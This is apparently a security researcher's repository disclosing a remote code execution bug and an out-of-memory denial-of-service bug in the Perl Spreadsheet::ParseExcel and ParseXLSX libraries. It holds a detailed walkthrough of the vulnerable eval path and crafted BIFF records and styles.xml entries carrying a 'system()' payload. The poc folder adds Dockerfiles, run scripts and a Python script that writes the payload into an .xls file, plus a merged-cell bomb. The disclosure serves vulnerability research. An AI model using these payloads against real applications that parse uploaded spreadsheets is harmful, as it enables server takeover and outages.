├── ParseXLSX_0days.pptx
├── README.md
├── parse_xlsx_bomb.md
└── poc
    ├── .gitignore
    ├── README.md
    ├── bomb
        ├── Dockerfile
        ├── ahihi.pl
        └── ahihi.xlsx
    ├── rce
        ├── Dockerfile
        ├── run.sh
        ├── test-xls.pl
        ├── test.pl
        ├── test.xls
        └── test.xlsx
    └── xls-payload.py


/ParseXLSX_0days.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/ParseXLSX_0days.pptx


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # ParseExcel security vulnerabilitiy
  2 | 
  3 | > TL;DR: RCE from logic in parsing format strings.
  4 | 
  5 | ## Short explanation on the exploit
  6 | 
  7 | Root cause of the exploitation comes from calling `eval` to an unvalidated user input in `Utility.pm`
  8 | 
  9 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/Utility.pm#L171
 10 | ```perl
 11 | # Uitlity.pm
 12 | sub ExcelFmt {
 13 | 	my ( $format_str, $number, $is_1904, $number_type, $want_subformats ) = @_;
 14 | 
 15 | 	return $number unless $number =~ $qrNUMBER;
 16 | 	
 17 | 	my $conditional;
 18 | 	if ( $format_str =~ /^\[([<>=][^\]]+)\](.*)$/ ) {
 19 | 		$conditional = $1;
 20 | 		$format_str  = $2;
 21 | 	}
 22 | 
 23 | 	#...
 24 | 
 25 | 	if ($conditional) {
 26 | 		# TODO. Replace string eval with a function.
 27 | 		$section = eval "$number $conditional" ? 0 : 1;
 28 | 	}
 29 |     #...
 30 | }
 31 | ```
 32 | 
 33 | According to what I inspected, current implementation for this flow lacks proper validation, while using `eval` for handling comparison logics is too "over kill" in this case. Because of this, both `ParseExcel::parse` and `ParseXLSX::parse` (used for reading data from Excel files) are vulnearble to RCE.
 34 | 
 35 | ### Where's `$format_str`?
 36 | `ValFmt` is the most possible caller of `ExcelFmt`, so I'll explain further into this method
 37 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L141-L161
 38 | ```perl
 39 | sub ValFmt {
 40 |     my ( $oThis, $oCell, $oBook ) = @_;
 41 | 
 42 |     my ( $Dt, $iFmtIdx, $iNumeric, $Flg1904 );
 43 | 
 44 |     if ( $oCell->{Type} eq 'Text' ) {
 45 |         $Dt =
 46 |           ( ( defined $oCell->{Val} ) && ( $oCell->{Val} ne '' ) )
 47 |           ? $oThis->TextFmt( $oCell->{Val}, $oCell->{Code} ) # Perform some encoding logic => doesn't cause RCE
 48 |           : '';
 49 | 
 50 |         return $Dt;
 51 |     }
 52 |     else {
 53 |         $Dt      = $oCell->{Val};
 54 |         $Flg1904 = $oBook->{Flg1904};
 55 |         my $sFmtStr = $oThis->FmtString( $oCell, $oBook );
 56 | 
 57 |         # where RCE lies => $oCell->{Type} must be either "Date" or "Number"
 58 |         return ExcelFmt( $sFmtStr, $Dt, $Flg1904, $oCell->{Type} ); 
 59 |     }
 60 | }
 61 | ```
 62 | If `$oCell->{Type}` is `Date` or `Number`, `ExcelFmt` will be called.
 63 | 
 64 | The value `$format_str` is the returned from another method: `FmtString`
 65 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L101-L136
 66 | ```perl
 67 | sub FmtString {
 68 |     my ( $oThis, $oCell, $oBook ) = @_;
 69 | 
 70 |     my $sFmtStr =
 71 |       $oThis->FmtStringDef( $oBook->{Format}[ $oCell->{FormatNo} ]->{FmtIdx},
 72 |         $oBook ); # maps to the correct format string
 73 |         
 74 |     #...
 75 | 
 76 |     unless ( defined($sFmtStr) ) {
 77 |         # assigns default format string depending on the value, can ignore
 78 |         #...
 79 |     }
 80 |     return $sFmtStr;
 81 | }
 82 | ```
 83 | Another function is being called, so we'll examine `FmtStringDef` as well
 84 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L87-L96
 85 | ```perl
 86 | sub FmtStringDef {
 87 |     my ( $oThis, $iFmtIdx, $oBook, $rhFmt ) = @_;
 88 |     my $sFmtStr = $oBook->{FormatStr}->{$iFmtIdx}; # does the mapping
 89 | 
 90 |     # More with assigning default format string, can ignore
 91 |     #...
 92 | }
 93 | ```
 94 | 
 95 | All variables are clear, we can conclude the attack vector as follows:
 96 | - Inject the malicious format string with index `$iFmtIdx`
 97 | - Make sure a cell format `$oBook->{Format}[$cellFmtIdx]` maps to `$iFmtIdx`
 98 | - Make sure a cell maps to that cell format (`$oCell->{FormatNo} = $cellFmtIdx`)
 99 | ![[flow 1.png]] 
100 | 
101 | In the sections below, I'll go over detailed explanation of how the payload propagated the shell code to `eval` command. There will be 2 sections for parsing .xls file using `ParseExcel` and parsing .xlsx file using `ParseXLSX`.
102 | 
103 | ## PoC
104 | To demonstrate, below is the link to our crafted malicious Excel files (in .xls and .xlsx) that runs `whoami` and stores result to `/tmp/inject.txt` file.
105 | https://gist.github.com/haile01/0f4f19e4441895ef33ff27385080478b
106 | 
107 | ### Exploitation on XLS file
108 | Take a simple Perl program to parse xls file like below, which uses `ParseExcel::parse`. RCE will happen while the parsing is performed, even before any data is fetched.
109 | 
110 | ```perl
111 | use strict;
112 | use Spreadsheet::ParseExcel;
113 | 
114 | my $parser = Spreadsheet::ParseExcel->new();
115 | # file.xls is malicious file from end user
116 | my $workbook = $parser->parse("test.xls");
117 | ```
118 | 
119 | #### Injecting format string
120 | Excel 97 binary files is structured in to chunks of binary data called BIFF record. Each record starts with a header called `opCode` (in little-endian), then the length of the record and it's actual data.
121 | 
122 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L438
123 | ```perl
124 | sub QueryNext {
125 |     my ( $q ) = @_;
126 | 
127 | 
128 |     if ( $q->{streamPos} + 4 >= $q->{streamLen} ) {
129 |         return 0;
130 |     }
131 | 
132 |     my $data = substr( $q->{stream}, $q->{streamPos}, 4 );
133 | 
134 |     ( $q->{opcode}, $q->{length} ) = unpack( 'v2', $data );
135 | 
136 |     # No biff record should be larger than around 20,000.
137 |     if ( $q->{length} >= 20000 ) {
138 |         return 0;
139 |     }
140 | 
141 |     if ( $q->{length} > 0 ) {
142 |         $q->{data} = substr( $q->{stream}, $q->{streamPos} + 4, $q->{length} );
143 |     }
144 |     else {
145 |         $q->{data}                     = undef;
146 |         $q->{dont_decrypt_next_record} = 1;
147 |     }
148 | 
149 |     if ( $q->{encryption} == MS_BIFF_CRYPTO_RC4 ) {
150 |         # Handles with decryption
151 |     }
152 |     elsif ( $q->{encryption} == MS_BIFF_CRYPTO_XOR ) {
153 |         # not implemented
154 |         return 0;
155 |     }
156 |     elsif ( $q->{encryption} == MS_BIFF_CRYPTO_NONE ) {
157 | 
158 |     }
159 | 
160 |     $q->{streamPos} += 4 + $q->{length};
161 | 
162 |     return 1;
163 | }
164 | ```
165 | 
166 | After that, a corresponding handler for record type is used to extract that BIFF record data.
167 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L576-L580
168 | 
169 | ```perl
170 | if ( defined $self->{FuncTbl}->{$record} && !$workbook->{_skip_chart} )
171 | {
172 | 		$self->{FuncTbl}->{$record}
173 | 			->( $workbook, $record, $record_length, $record_header );
174 | }
175 | ```
176 | 
177 | Format string is handled by `_subFormat`, with `opCode = 0x41E` 
178 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1563-L1585
179 | ```perl
180 | sub _subFormat {
181 | 
182 |     my ( $oBook, $bOp, $bLen, $sWk ) = @_;
183 |     my $sFmt;
184 | 
185 |     if ( $oBook->{BIFFVersion} <= verBIFF5 ) {
186 |         $sFmt = substr( $sWk, 3, unpack( 'c', substr( $sWk, 2, 1 ) ) );
187 |         $sFmt = $oBook->{FmtClass}->TextFmt( $sFmt, '_native_' );
188 |     }
189 |     else {
190 |         $sFmt = _convBIFF8String( $oBook, substr( $sWk, 2 ) );
191 |     }
192 | 
193 |     my $format_index = unpack( 'v', substr( $sWk, 0, 2 ) );
194 | 
195 |     # Excel 4 and earlier used an index of 0 to indicate that a built-in format
196 |     # that was stored implicitly.
197 |     if ( $oBook->{BIFFVersion} <= verBIFF4 && $format_index == 0 ) {
198 |         $format_index = keys %{ $oBook->{FormatStr} };
199 |     }
200 | 
201 |     $oBook->{FormatStr}->{$format_index} = $sFmt;
202 | }
203 | ```
204 | 
205 | I wasn't sure which BIFF version being used in my .xls file but according to the data in the binary file, it should match with the `else` case (> `verBIFF5`).
206 | 
207 | Structure of format string record in newer BIFF versions should be
208 | **1E 04 \[record length - 2 bytes\] \[format string index - 2 bytes\] \[format string length - 1 byte\] \[string flags - 2 bytes\] \[format string content\]**
209 | 
210 | By following the correct structure, I can inject any format string into the .xls file.
211 | 
212 | The actual BIFF record for format string I injected in the PoC (format string index is `\x00\xa5`)
213 | ```
214 | 00000000: 1e04 3100 a500 2c00 005b 3e31 3233 3b73  ..1...,..[>123;s
215 |                     ^^^^
216 | 		        format string index
217 | 00000010: 7973 7465 6d28 2777 686f 616d 6920 3e20  ystem('whoami >
218 | 00000020: 2f74 6d70 2f69 6e6a 6563 742e 7478 7427  /tmp/inject.txt'
219 | 00000030: 295d 3132 33                             )]123
220 | ```
221 | 
222 | #### Mapping a cell format to the format string
223 | Cell formats will define many properties for a cell, such as format string, styling, fonts, ... One cell format can link to one format string by including format string's index inside their BIFF record. This logic is handled by `_subXf`
224 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1441-L1558
225 | 
226 | ```perl
227 | sub _subXF {
228 |     my ( $oBook, $bOp, $bLen, $sWk ) = @_;
229 |     
230 |     #...
231 | 
232 |     if ( $oBook->{BIFFVersion} == verBIFF4 ) {
233 |         #...
234 |     }
235 |     elsif ( $oBook->{BIFFVersion} == verBIFF8 ) {
236 |         my ( $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn );
237 | 
238 |         ( $iFnt, $iIdx, $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn )
239 |           = unpack( "v7Vv", $sWk );
240 |         #...
241 |     }
242 |     else {
243 |         ( $iFnt, $iIdx, $iGen, $iAlign, $iPtn, $iPtn2, $iBdr1, $iBdr2 ) =
244 |           unpack( "v8", $sWk );
245 |         #...
246 |     }
247 | 
248 |     push @{ $oBook->{Format} }, Spreadsheet::ParseExcel::Format->new(
249 |         FontNo => $iFnt,
250 |         Font   => $oBook->{Font}[$iFnt],
251 |         FmtIdx => $iIdx, # <- the index that points to format string index
252 |         #...
253 |     );
254 | }
255 | ```
256 | Because our `BIFFVersion` is greater than BIFF5, the condition shouldn't fall into the first case. For the other two, we know that `$iIdx` is the second word in BIFF data. That's why it's trivial to perform this step also.
257 | 
258 | The actual BIFF record for cell format I used in the PoC
259 | ```
260 | 00000000: e000 1400 0000 a500 f5ff 2000 0000 0000  .......... .....
261 |                          ^^^^
262 |                   format string index
263 | 00000010: 0000 0000 0000 c020                      .......
264 | ```
265 | More over, cell formats are identified by its index in a list, so I modified the first record, then my cell format index should be `0`
266 | 
267 | #### Mapping a cell to the cell format
268 | For a cell to apply a format, it should include the ID of the cell format inside the cell's BIFF record. However, as I mentioned before, only cell with type `Number` or `Date` can trigger the RCE, so I'll use a cell with date type for the PoC (refered as RK BIFF record).
269 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L918-L939
270 | 
271 | ```perl
272 | sub _subRK {
273 |     my ( $workbook, $biff_number, $length, $data ) = @_;
274 |     my ( $row, $col, $format_index, $rk_number ) = unpack( 'vvvV', $data );
275 |     my $number = _decode_rk_number( $rk_number );
276 | 
277 |     _NewCell(
278 |         $workbook, $row, $col,
279 |         Kind     => 'RK',
280 |         Val      => $number,
281 |         FormatNo => $format_index,
282 |         Format   => $workbook->{Format}->[$format_index],
283 |         Numeric  => 1,
284 |         Code     => undef,
285 |         Book     => $workbook,
286 |     );
287 |     #... 
288 | }
289 | ```
290 | We can see that the index that maps to a cell format is now the third word of the record, so all we need to do is null-out this word into `\x00`
291 | 
292 | The actual BIFF record for date cell I used in the PoC
293 | ```
294 | 00000000: 7e02 0a00 0000 0000 0000 201a e240       ~......... ..@
295 |                               ^^^^
296 | 	                        format index
297 | ```
298 | 
299 | Note that the method `_subRK` haven't explicitly define the type `Date` yet. Type checking is implemented in `chkType` instead
300 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L166-L181
301 | 
302 | ```perl
303 | sub ChkType {
304 |     my ( $oPkg, $iNumeric, $iFmtIdx ) = @_;
305 |     if ($iNumeric) {
306 |         if (   ( ( $iFmtIdx >= 0x0E ) && ( $iFmtIdx <= 0x16 ) )
307 |             || ( ( $iFmtIdx >= 0x2D ) && ( $iFmtIdx <= 0x2F ) ) )
308 |         {
309 |             return "Date";
310 |         }
311 |         else {
312 |             return "Numeric";
313 |         }
314 |     }
315 |     else {
316 |         return "Text";
317 |     }
318 | }
319 | ```
320 | Since `$iNumeric` is set to `1`, we are sure that type is not `Text`
321 | 
322 | Finally, when initializing a new `Cell` object, `ValFmt` will be called and continue with the execution chain, propagate our shell to `eval` method.
323 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel.pm#L2375-L2433
324 | 
325 | ### Exploitation on XLSX file
326 | Working with .xlsx file is quite easier, since we can directly modify the data in plaintext (xml format).
327 | Take a simple Perl program to parse xls file like below, which uses `ParseXLSX::parse`. RCE will happen while the parsing is performed, even before any data is fetched.
328 | 
329 | ```perl
330 | use strict;
331 | use Spreadsheet::ParseExcel;
332 | use Spreadsheet::ParseXLSX;
333 | 
334 | my $parser = Spreadsheet::ParseXLSX->new();
335 | # file.xlsx is malicious file from end user
336 | my $workbook = $parser->parse("test.xlsx");
337 | ```
338 | XLSX file is a zip file that compresses many xml files, each containing specific types of data of the workbook.
339 | Below is the example of folder structure:
340 | ```
341 | |- [Content_Types].xml 
342 | |- _rels
343 | |- docProps
344 | 	|- app.xml
345 | 	|- core.xml
346 | |- xl
347 | 	|- _rels   
348 | 		|- workbook.xml.rels          
349 | 	|- styles.xml              <--- Format strings & cell formats       
350 | 	|- workbook.xml
351 | 	|- sharedStrings.xml 
352 | 	|- theme             
353 | 		|- theme1.xml
354 | 	|- worksheets
355 | 		|- sheet1.xml            <--- Cell values
356 | ```
357 | 
358 | #### Injecting format string & mapping to a cell format
359 | Format string is included in `xl/styles.xml` file, under `<numFmts>` tag, while cell formats are defined under `<cellXfs>` tag.
360 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L630-L923
361 | 
362 | ```perl
363 | sub _parse_styles {
364 |     # ...
365 |     my %format_str = (
366 |         %default_format_str,
367 |         (map {
368 |             $_->att('numFmtId') => $_->att('formatCode')
369 |         } $styles->find_nodes('//s:numFmts/s:numFmt')),
370 |     );
371 |     # ...
372 |     my @format = map {
373 |         my %opts = (
374 |             %default_format_opts,
375 |             %ignore,
376 |         );
377 |         # ...
378 |         $opts{FmtIdx}   = 0+($xml_fmt->att('numFmtId')||0);
379 |         # ...
380 |         Spreadsheet::ParseExcel::Format->new(%opts)
381 |     } $styles->find_nodes('//s:cellXfs/s:xf');
382 |     # ...
383 |     
384 |     
385 |     return {
386 |         FormatStr => \%format_str,
387 |         Font      => \@font,
388 |         Format    => \@format,
389 |     }
390 | }
391 | ```
392 | 
393 | To inject a format string, we need to add a `<numFmt>` tag, with `formatCode` being the format string, and `numFmtId` being any integer value we want. Here I used `123`.
394 | 
395 | After that, we'll add one more `<xf>` cell to map to the format string, where `numFmtId` attribute being our chosen id (`123`)
396 | 
397 | The final xml data I used in the PoC
398 | ```xml
399 | <!-- xl/styles.xml -->
400 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
401 | <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
402 | ...
403 |   <numFmts count="1">
404 |     <!-- injected format string -->
405 |     <numFmt numFmtId="123" formatCode="[>123;system('whoami > /tmp/inject.txt')]123"/>
406 |   </numFmts> 
407 | ...
408 |   <cellXfs count="4">
409 |     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
410 |     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
411 |       <alignment horizontal="center"/>
412 |     </xf>
413 |     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
414 |     <!-- injected cell format -->
415 |     <xf numFmtId="123" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
416 |   </cellXfs>
417 | ...
418 | </styleSheet>
419 | ```
420 | 
421 | #### Mapping a cell to the cell format
422 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L205-L487
423 | ```perl
424 | sub _parse_sheet {
425 |     my $sheet_xml = $self->_new_twig(
426 |         twig_roots => {
427 |             #...
428 |             's:sheetData/s:row' => sub {
429 |                 my ( $twig, $row_elt ) = @_;
430 |                 for my $cell ( $row_elt->children('s:c') ){
431 |                     my $type = $cell->att('t') || 'n';
432 |                     my $val = $val_xml ? $val_xml->text : undef;
433 | 
434 |                     #...
435 |                     elsif ($type eq 'n') {
436 |                         $long_type = 'Numeric';
437 |                         $val = defined($val) ? 0+$val : undef;
438 |                     }
439 |                     elsif ($type eq 'd') {
440 |                         $long_type = 'Date';
441 |                     }
442 |                     # other $type results into $long_type = 'Text'
443 |                     #...
444 |                     
445 |                     my $format_idx = $cell->att('s') || 0;
446 |                     my $format = $sheet->{_Book}{Format}[$format_idx];
447 |                     die "unknown format $format_idx" unless $format;
448 |                     
449 |                     my $cell = Spreadsheet::ParseExcel::Cell->new(
450 |                         Val      => $val,
451 |                         Type     => $long_type,
452 |                         Merged   => undef, # fix up later
453 |                         Format   => $format,
454 |                         FormatNo => $format_idx,
455 |                         ($formula
456 |                             ? (Formula => $formula->text)
457 |                             : ()),
458 |                         Rich     => $Rich,
459 |                     );
460 |                     $cell->{_Value} = $sheet->{_Book}{FmtClass}->ValFmt(
461 |                         $cell, $sheet->{_Book}
462 |                     );
463 |                 }
464 |             }
465 |         }
466 |     )
467 | }
468 | ```
469 | Logic for reading cell data in this library is more straightforward, only assign the type & value directly from xml tag attributes. Since we need `$oCell->{Type}` to be `Date` or `Numeric`, we just need attribute `t` to be `d` or `n`. To map the cell to the cell format, we'll also set attribute `s` to be the index of the cell format (`3`).
470 | 
471 | The final xml data I used in the PoC
472 | ```xml
473 | <!-- xl/worksheets/sheet1.xml -->
474 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
475 | <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{39528CB2-0246-0542-84DC-33008C4AE4F2}">
476 |   ...
477 |   <sheetData>
478 |     <row r="1" spans="1:2" x14ac:dyDescent="0.2">
479 |       <c r="A1" s="3" t="n"> <!-- 3 is the order of our cell format -->
480 |         <v>0</v>
481 |       </c>
482 |       <c r="B1" s="2"/>
483 |     </row>
484 |   </sheetData>
485 |   ...
486 | </worksheet>
487 | `
488 | 


--------------------------------------------------------------------------------
/parse_xlsx_bomb.md:
--------------------------------------------------------------------------------
 1 | # ParseXLSX security vulnerbilities
 2 | 
 3 | > TL;DR: memory utilization go brrrr
 4 | 
 5 | ## DoS via out-of-memory bugs
 6 | 
 7 | ### Analysis
 8 | 
 9 | ParseXLSX also handles with merged cells, but the memoize implementation allows attacker to allocate an arbitrary memory size.
10 | 
11 | ```perl
12 | # ParseXLSX.pm
13 | sub _parse_sheet {
14 |     my $sheet_xml = $self->_new_twig(
15 |         twig_roots => {
16 |             #...
17 |             's:mergeCells/s:mergeCell' => sub {
18 |                 my ( $twig, $merge_area ) = @_;
19 | 
20 |                 if (my $ref = $merge_area->att('ref')) {
21 |                     my ($topleft, $bottomright) = $ref =~ /([^:]+):([^:]+)/;
22 | 
23 |                     # Parse cell coordinates to numeric
24 |                     my ($toprow, $leftcol)     = $self->_cell_to_row_col($topleft);
25 |                     my ($bottomrow, $rightcol) = $self->_cell_to_row_col($bottomright);
26 | 
27 |                     push @{ $sheet->{MergedArea} }, [
28 |                         $toprow, $leftcol,
29 |                         $bottomrow, $rightcol,
30 |                     ];
31 |                     
32 |                     # Saves merged state for each cell in the merged cell
33 |                     for my $row ($toprow .. $bottomrow) {
34 |                         for my $col ($leftcol .. $rightcol) {
35 |                             $merged_cells{"$row;$col"} = 1;
36 |                         }
37 |                     }
38 |                 }
39 | 
40 |                 $twig->purge;
41 |             },
42 |         }
43 |     )
44 | }
45 | 
46 | sub _cell_to_row_col {
47 |     my $self = shift;
48 |     my ($cell) = @_;
49 | 
50 |     my ($col, $row) = $cell =~ /([A-Z]+)([0-9]+)/;
51 | 
52 |     my $ncol = 0;
53 |     for my $char (split //, $col) {
54 |         $ncol *= 26;
55 |         $ncol += ord($char) - ord('A') + 1;
56 |     }
57 |     $ncol = $ncol - 1;
58 | 
59 |     my $nrow = $row - 1;
60 | 
61 |     return ($nrow, $ncol);
62 | }
63 | ```
64 | 
65 | Because the size of a merged cell doesn't have any constraints, this can make the program allocates huge amount of memory, exhausts swap memory and crashes the server.
66 | 
67 | ### Final POC
68 | In `xl/worksheets/sheet1.xml`, add
69 | ```xml
70 |   <mergeCells count="1">
71 |     <mergeCell ref="A1:ZZZZ9999"/>
72 |   </mergeCells>
73 | ```
74 | inside `<worksheet>` tag, or modify `ref` attribute of any existing `<mergeCell>` tag.
75 | 
76 | This would make the program allocates at least $26^3 . 10^4 \approx 4.5 . 10^9$ bytes just for handling merged cells.
77 | 
78 | ### Mitigation
79 | I think that this vulnerability can be fixed in either 2 ways:
80 | - Set a limit in range inside `_cell_to_row_col` subroutine
81 | - Use a different method to handle merged cells, instead of preemptively marking like the current solution.
82 | 


--------------------------------------------------------------------------------
/poc/.gitignore:
--------------------------------------------------------------------------------
1 | tmp/
2 | .DS_STORE
3 | .vscode/
4 | 


--------------------------------------------------------------------------------
/poc/README.md:
--------------------------------------------------------------------------------
 1 | ## POC for ParseExcel and ParseXLSX vulnerabilities
 2 | ### Memory corruption
 3 | Build and run docker image in `/bomb` folder, using this command
 4 | 
 5 | `docker build -t perl-xlsx-bomb . && docker run --name perl-xlsx-bomb -m 4g -d perl-xlsx-bomb`
 6 | 
 7 | `4g` to limit memory size for docker container.
 8 | It will keep filling memory, swap memory and finally terminates for out of resource
 9 | 
10 | ### RCE
11 | Build and run docker image in `/rce`, using this command
12 | 
13 | `docker build -t parseexcel-rce . && docker run parseexcel-rce`
14 | 
15 | Notice that RCE will result in `root` being written in `/tmp/inject.txt` after each perl run
16 | 
17 | #### .xls exploit
18 | Because the data is binary, it's quite hard to modify them manually. So I wrote a small script `xls-payload.py` to do that.
19 | Also, there are a lot of flag checks and integrity ensurance stuffs on xls branch, I chose not to dig into all of that. And now I have zero idea what it does. So the overall idea of the script is to manually add a custom format on Excel app as a placeholder, which matches the length of the desired payload. Then the script overwrites that placeholder, do some format mapping stuffs. And vòila.
20 | 
21 | Here are the steps:
22 | 1. Run `xls-payload.py`, copy the placeholder (plz also copy the quotation marks on both ends)
23 | 2. Create `test.xls` file in the same folder (make sure to use Excel app on Windows, not sure why but Excel on MacOS or OpenOffice or Libre Office chips away some flags that we need). Input a number on a cell. Go to `Format Cell` > `Custom` and paste the placeholder. Now that cell should show a bunch of `a`s
24 | 3. Enter on the script once more. The xls file is now corrupted (make sure you won't open the file again on Excel app, or the payload will be gone). Then `mv test.xls rce/` and start a docker container to verify.
25 | 


--------------------------------------------------------------------------------
/poc/bomb/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM perl:5.32
2 | 
3 | COPY ahihi.xlsx /app/ahihi.xlsx
4 | COPY ahihi.pl /app/ahihi.pl
5 | WORKDIR /app
6 | RUN cpanm Spreadsheet::ParseXLSX
7 | 
8 | CMD ["perl", "ahihi.pl"]
9 | 


--------------------------------------------------------------------------------
/poc/bomb/ahihi.pl:
--------------------------------------------------------------------------------
 1 | use Spreadsheet::ParseXLSX;
 2 | use Spreadsheet::ParseExcel;
 3 | use open qw( :std :encoding(UTF-8) );
 4 | 
 5 | my $t = time();
 6 | my $parser = Spreadsheet::ParseXLSX->new();
 7 | my $workbook = $parser->parse("ahihi.xlsx") or die $parser->error;
 8 | 
 9 | $t = time() - $t;
10 | print "Parsing took $t secs";
11 | 


--------------------------------------------------------------------------------
/poc/bomb/ahihi.xlsx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/bomb/ahihi.xlsx


--------------------------------------------------------------------------------
/poc/rce/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM perl:5.32
2 | 
3 | COPY . /app
4 | WORKDIR /app
5 | RUN cpanm Spreadsheet::ParseExcel@0.65
6 | RUN cpanm Spreadsheet::ParseXLSX@0.27
7 | 
8 | CMD bash run.sh
9 | 


--------------------------------------------------------------------------------
/poc/rce/run.sh:
--------------------------------------------------------------------------------
 1 | echo "=== POC for ParseXLSX ==="
 2 | rm /tmp/inject.txt
 3 | perl test.pl
 4 | cat /tmp/inject.txt
 5 | 
 6 | echo "=== POC for ParseExcel ==="
 7 | rm /tmp/inject.txt
 8 | perl test-xls.pl
 9 | cat /tmp/inject.txt
10 | 


--------------------------------------------------------------------------------
/poc/rce/test-xls.pl:
--------------------------------------------------------------------------------
1 | use Spreadsheet::ParseExcel;
2 | use open qw( :std :encoding(UTF-8) );
3 | 
4 | my $parser = Spreadsheet::ParseExcel->new();
5 | my $workbook = $parser->parse("test.xls") or die $parser->error;
6 | 


--------------------------------------------------------------------------------
/poc/rce/test.pl:
--------------------------------------------------------------------------------
1 | use Spreadsheet::ParseXLSX;
2 | use Spreadsheet::ParseExcel;
3 | use open qw( :std :encoding(UTF-8) );
4 | 
5 | my $parser = Spreadsheet::ParseXLSX->new();
6 | my $workbook = $parser->parse("test.xlsx") or die $parser->error;
7 | 


--------------------------------------------------------------------------------
/poc/rce/test.xls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xls


--------------------------------------------------------------------------------
/poc/rce/test.xlsx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xlsx


--------------------------------------------------------------------------------
/poc/xls-payload.py:
--------------------------------------------------------------------------------
 1 | # Inject shell to format string
 2 | shell = "system('whoami > /tmp/inject.txt')"
 3 | fmtStr = f'[>123;{shell}]123'
 4 | pattern = f'"{"a" * (len(fmtStr) - 2)}"'
 5 | print(pattern)
 6 | input()
 7 | 
 8 | xls = open('test.xls', 'rb').read()
 9 | 
10 | l = xls.index(pattern.encode())
11 | assert l != -1 #Pattern must exist
12 | r = l + len(pattern)
13 | 
14 | fmtIdx = xls[l - 5:l - 3]
15 | payload_len = len(fmtStr)
16 | 
17 | xls = xls[:l] + fmtStr.encode() + xls[r:]
18 | 
19 | # Apply format string to xf
20 | XF_opcode_w_len = b'\xe0\x00\x14\x00' # Assume highest BIFF version
21 | l = xls.index(XF_opcode_w_len) # First means format index = 0
22 | assert l != -1 # XF must exist
23 | xls = xls[:l + 6] + fmtIdx + xls[l + 8:]
24 | 
25 | # Apply format to cell
26 | RK_opcode = b'\x7e\x02'
27 | l = xls.index(RK_opcode)
28 | assert l != -1 # Date must exist
29 | l += 8
30 | 
31 | xls = xls[:l] + b'\x00\x00' + xls[l + 2:] # format index 0
32 | 
33 | open('test.xls', 'wb').write(xls)
34 | 


--------------------------------------------------------------------------------